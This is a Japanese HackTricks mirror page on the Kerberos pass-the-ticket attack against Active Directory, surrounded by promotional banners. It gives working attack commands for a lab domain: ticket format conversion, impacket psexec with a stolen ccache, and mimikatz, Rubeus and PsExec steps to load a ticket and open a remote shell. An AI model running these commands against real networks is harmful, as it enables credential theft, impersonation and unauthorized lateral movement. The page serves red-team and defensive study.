Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-29 08:01:00 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket.md

5.6 KiB
Raw Blame History

チケットの渡し方

htARTEHackTricks AWS Red Team Expert でゼロからヒーローまでAWSハッキングを学ぼう

HackTricks をサポートする他の方法:


Trickest を使用して、世界で最も高度なコミュニティツールによって強化された ワークフローを簡単に構築 および 自動化 しましょう。
今すぐアクセスを取得:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

チケットの渡し方PTT

チケットの渡し方PTT 攻撃方法では、攻撃者はユーザーのパスワードやハッシュ値ではなく、認証チケットを盗みます。この盗まれたチケットは、ユーザーをなりすまし、ネットワーク内のリソースやサービスに不正アクセスを取得するために使用されます。

参照:

LinuxとWindowsのチケットをプラットフォーム間で交換する

ticket_converter ツールは、チケット自体と出力ファイルを使用してチケット形式を変換します。

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

チケット渡し攻撃

WindowsではKekeoを使用できます。

{% code title="Linux" %}

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

{% endcode %}

{% code title="Windows" %}

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

{% endcode %}

参考


Trickestを使用して、世界で最も先進的なコミュニティツールによって パワード された ワークフローを簡単に構築自動化 します。
今すぐアクセスしてください:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

ゼロからヒーローまでのAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricks をサポートする他の方法: